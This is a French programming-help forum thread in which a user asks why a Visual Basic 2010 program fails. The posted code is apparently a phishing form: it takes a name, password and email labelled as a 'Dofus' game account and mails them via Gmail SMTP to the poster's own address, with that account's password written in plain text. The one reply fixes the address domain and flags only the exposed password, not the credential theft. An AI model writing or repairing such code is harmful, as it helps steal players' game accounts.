Problème microsoft visual basic 2010

Résolu/Fermé
FragMenteur Messages postés 8 Date d'inscription mardi 29 avril 2014 Statut Membre Dernière intervention 9 mars 2017 - 21 juil. 2014 à 16:56
FragMenteur Messages postés 8 Date d'inscription mardi 29 avril 2014 Statut Membre Dernière intervention 9 mars 2017 - 21 juil. 2014 à 20:00
bonjour, j'ai comme vous l'avez compris un probleme au niveau de microsoft visual basic 2010 dans mon codage.
mon problème est que quand je lance le debguage et que je rempli mon formulaire et clic sur continuer je suis automatquement renvoyer sur mon codage et on m'affiche ceci :



voici ma config :
Imports System.Net.Mail

Public Class fsf
    Private nom As String
    Private pass As String
    Private mail As String
    Private message As String

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim MyMailMessage As New MailMessage()
        Dim SMTPServer As New SmtpClient("smtp.gmail.com")

        nom = tbnom.Text
        pass = tbpass.Text
        mail = tbmail.Text
        message = "nom : " & nom & vbNewLine & "pass : " & pass & vbNewLine & "mail : " & mail

        MyMailMessage.From = New MailAddress("jules.youtube@gmail.fr")
        MyMailMessage.To.Add("jules.youtube@gmail.fr")
        MyMailMessage.Subject = ("Dofus Compte")
        MyMailMessage.Body = (message)

        SMTPServer.Port = ("587") 'Port
        SMTPServer.Credentials = New System.Net.NetworkCredential("jules.youtube@gmail.fr", "ferrari458JW")
        SMTPServer.EnableSsl = True

        SMTPServer.Send(MyMailMessage) 'Envoi

    End Sub

End Class
A voir également:

1 réponse

totodunet Messages postés 1377 Date d'inscription mercredi 18 mars 2009 Statut Membre Dernière intervention 5 mars 2020 199
Modifié par baladur13 le 21/07/2014 à 20:48
salut,

parce que je pense que c'est xxxxxx@gmail.com ton adresse

et évites de mettre ton mot de passe, mets plutôt "password" à la place, on comprendra

Qui ne tente rien n'a rien
0
FragMenteur Messages postés 8 Date d'inscription mardi 29 avril 2014 Statut Membre Dernière intervention 9 mars 2017
21 juil. 2014 à 20:00
ok ca marche merci <3
0